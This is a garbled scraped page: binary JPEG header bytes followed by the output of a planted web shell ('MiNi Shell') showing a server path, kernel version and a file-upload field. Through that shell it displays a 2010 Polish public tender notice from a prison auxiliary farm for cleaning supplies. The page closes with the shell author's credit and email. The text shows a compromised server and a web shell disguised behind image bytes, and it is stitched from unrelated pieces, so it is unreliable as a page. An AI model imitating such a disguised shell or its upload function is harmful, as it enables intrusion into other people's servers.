JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100313/70674-N-2010.html

<p class="kh_header"><b>Wygoda: dostawa chemii gospodarczej</b><br>
<b>Numer ogłoszenia: 70674 - 2010; data zamieszczenia: 13.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze przy Zakładzie Karnym , Czerwony Bór 23, 18-408 Wygoda, woj. podlaskie, tel. 086 2153595, 2163604, faks 086 2163149.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gpczerwonybor.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa chemii gospodarczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. PRZEDMIOT ZAMÓWIENIA
1.	Przedmiotem zamówienia jest dostawa chemii gospodarczej na rzecz Zamawiającego, według wyszczególnienia zawartego w pkt 2, do następujących punktów: 
1)	Kantyna GospodarstwaPomocniczego w Zakładzie Karnym w Czerwonym Borze, Czerwony Bór 2, 18-400 Łomża;
2)	Kantyna GospodarstwaPomocniczego przy Zakładzie Karnym w Czerwonym Borze,Przytuły Stare 13a, 07-411 Rzekuń (Areszt Śledczy Ostrołęka - Oddział Tymczasowego Zakwaterowania Skazanych.
3)	 Gospodarstwo Pomocnicze przy Zakładzie Karnym w Czerwonym Borze, Czerwony Bór 23, 18-400 Łomża
2.	Wyszczególnienie przedmiotu dostawy : 

L.p.	Asortyment	Jm.	Ilość do:
1.	chusteczki higieniczne( po 10 chusteczek w paczce)	paczka	2500
2.	odświeżacz powietrza żelowy nie mniej niż 150g	szt.	200
3.	kostka do WC koszyk	szt.	440
4.	papier toaletowy szary op 8szt (nie mniej niż 36,5m w rolce, jednowarstwowy)	op.	1300
5.	papier toaletowy zapach op. 8 szt.(dwuwarstwowy nie mniej niż 180 listków w rolce)	op.	1150
6.	Pumeks	szt.	300
7.	płyn do naczyń 250ml	szt.	3000
8.	płyn do naczyń 500ml	szt.	100
9.	płyn do płukania Silan 500ml	szt.	2000
10.	płyn do prania KOKOSAL 450ml	szt.	300
11.	proszek do prania E 400g	szt.	2000
12.	proszek do prania IXI 400g	szt.	2500
13.	proszek do prania PERSIL 400g	szt.	1500
14.	ace 1 l	szt	100
15.	czyścik do teflonu i stali nierdzewnej	szt	50
16.	druciak - zmywak	szt	50
17.	druciak spiralny maxi	szt	100
18.	gąbka do zmywania duża dwuwarstwowa op.5 szt.	op.	800
19.	kostka do spłuczki	szt	30
20.	mleczko do czyszczenia urządzeń sanitarnych, sprzętu i naczyń kuchennych 500ml	szt	320
21.	mydło toaletowe 200 g Biały Jeleń	szt	50
22.	mydło w płynie 5 l	op.	20
23.	mydło w płynie antybakteryjne 5 l	op.	5
24.	odświeżacz powietrza stojący podnoszony w żelu	szt	200
25.	odświeżacz powietrza w aerozolu	szt	150
26.	pasta BHP 500 g  (mydlana  i mydlana ze ścierniwem)	szt	2400
27.	pasta do czyszczenia urządzeń sanitarnych, sprzętów i naczyń kuchennych 250 g	szt	70
28.	płyn do czyszczenia i dezynfekcji toalet i innych urządzeń sanitarnych 750 ml z dodatkiem chloru	szt	260
29.	płyn do czyszczenia powierzchni drewnianych aerozol 250 ml	szt	50
30.	płyn do mycia naczyń kuchennych 5 l	op.	150
31.	płyn do mycia szyb atomizer 500 ml	szt	270
32.	preparat do udrażniania rur w żelu 500 ml	szt	50
33.	proszek do prania w automacie - biel	kg	25
34.	proszek do prania w automacie - kolor	kg	25
35.	proszek do szorowania sprzętu i urządzeń kuchennych 1000 g	szt	20
36.	ręcznik papierowy kuchenny op. 2 szt (dwustronny 48 listków)	op.	650
37.	ręcznik papierowy biały dwuwarstwowy MAXI (surowiec makulatura dł rolki 155m wys. 21 cm, 620 listków po 25 cm) 	szt.	350
38.	ręcznik papierowy biały dwuwarstwowy MINI (surowiec makulatura dł. Rolki 75 m wys. Rolki 21cm, 300 listków po 25cm)  	szt.	500
39.	ręcznik listkowy składany Z-Z do podajnika, kolor biały, pakowany w pakiety po 150 listków, w  kartonie 20 pakietów (karton zawiera 3000 listków)	karton	18
40.	rękawiczki lateksowe op. 100 szt.	op.	60
41.	rękawiczki gospodarcze ochronne gumowe flokowane gramatura 50g. 	para	150
42.	ściereczka domowa op. 3 szt. (30x38)	op.	350
43.	ścierka ostra (zmywak)	szt	130
44.	ścierka podłogowa biała	szt	180
45.	środek do usuwania rdzy i kamienia 500 ml	szt	20
46.	uniwersalny płyn do czyszczenia 5 l	op.	100
47.	uniwersalny płyn do czyszczenia 750 ml	szt	130
48.	worki na śmieci 120 l/25 szt. czarne mocne LDPE	op.	1250
49.	worki na śmieci 35 l/ 50 szt. czarne mocne HDPE	op.	150
50.	worki na śmieci 60l/10 szt. czarne mocne LDPE	op.	5900

3.	Warunki jakie musi spełnić przedmiot dostawy i warunki dostawy: 
1)	przedmiot dostawy musi spełniac wymogi określone przez Zamawiającego dla każdego rodzaju asortymentu, i spełniać wymogi określone przepisami odrębnymi, 
2)	dostawa będzie zrealizowana w godzinach od 7.30 do 13.30, w ciagu dwóch dni roboczych od momentu otrzymania przez Wykonawcę zamówienia,
3)	Wykonawca dostarczy przedmiot zamówienia własnym transportem, na własny koszt, 
4)	Wykonawca dokona wyładunku dostarczonego asortymentu w miejscu składowania wskazanym przez Zamawiającego,
5)	Przedmiot dostawy nie może nosić żadnych użycia czy też uszkodzeń mechanicznych.
6)	W przypadku zamawiania przez Zamawiającego większych partii towaru stanowiącego przedmiot zamówienia, Zamawiający ma prawo do określenia minimalnego terminu przydatności do użycia.
7)	Wykonawca dostarczy przedmiot zamówienia w opakowaniach zbiorczych zapewniajacych odpowiednie zabezpieczenie dostarczanego asortymentu.
8)	Dostawca zabezpieczy przedmiot zamówienia przed niekorzystnym oddziaływaniem warunków atmosferycznych na dostarczany towar w trakcie transportu. 
4.	Zamawiający zastrzega sobie prawo do żądania zmiany asortymentu stanowiącego przedmiot umowy w przypadku, gdy jego jakość i walory użytkowe znacznie odbiegają od żądanych,  z zastrzeżeniem utrzymania ceny nie większej niż określona w umowie.  
5.	Zamawiający zastrzega sobie prawo do przedłużenia terminu obowiązywania umowy w sprawie udzielenia zamówienia do czasu wyczerpania asortymentu będącego przedmiotem zamówienia, z zastrzeżeniem że Zamawiający  może w zależności od potrzeb zamówić większą ilość jednego z asortymentów będących przedmiotem zamówienia, kosztem innego pod warunkiem że ogólna wartość umowy nie ulegnie zwiększeniu.  
6.	Wykonawca zobowiązany jest utrzymać ceny określone w ofercie przez cały okres obowiązywania umowy. 
7.	Termin płatności wynagrodzenia należnego Wykonawcy wynosi 30 dni od daty dostarczenia prawidłowo wystawionej faktury do siedziby Zamawiającego.
8.	Zamawiający nie przyjmie faktury jeżeli zostaną zgłoszone jakiekolwiek zastrzeżenia do przedmiotu dostawy. 
9.	Zamawiający w terminie 7 dni roboczych licząc od dnia dostawy ma prawo reklamować przedmiot dostawy. 
10.	Na rozpatrzenie reklamacji Wykonawca ma 7 dni roboczych. 
11.	W przypadku uznania reklamacji Wykonawca w ciągu 7 dni roboczych usunie zgłoszone nieprawidłowości poprzez uzupełnienie dostawy w przypadku rozbieżności w ilości lub - wymieni towar na nowy w przypadku zakwestionowania jakości.
12.	Reklamacje Zamawiający będzie zgłaszał pocztą, telefonicznie lub faxem za potwierdzeniem, do osoby wskazanej przez Wykonawcę.
13.	Nie udzielenie odpowiedzi na złożoną reklamację w ciągu 7 dni roboczych od dnia jej otrzymania przyjmuje się za uznanie reklamacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 24.95.50.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana poszczególnych elementów przedmiotu zamówienia, pod warunkiem że wycofane zostana one z produkcji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gpczerwonybor.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego pok 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2010 godzina 12:00, miejsce: siedziba Zamawiającego - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com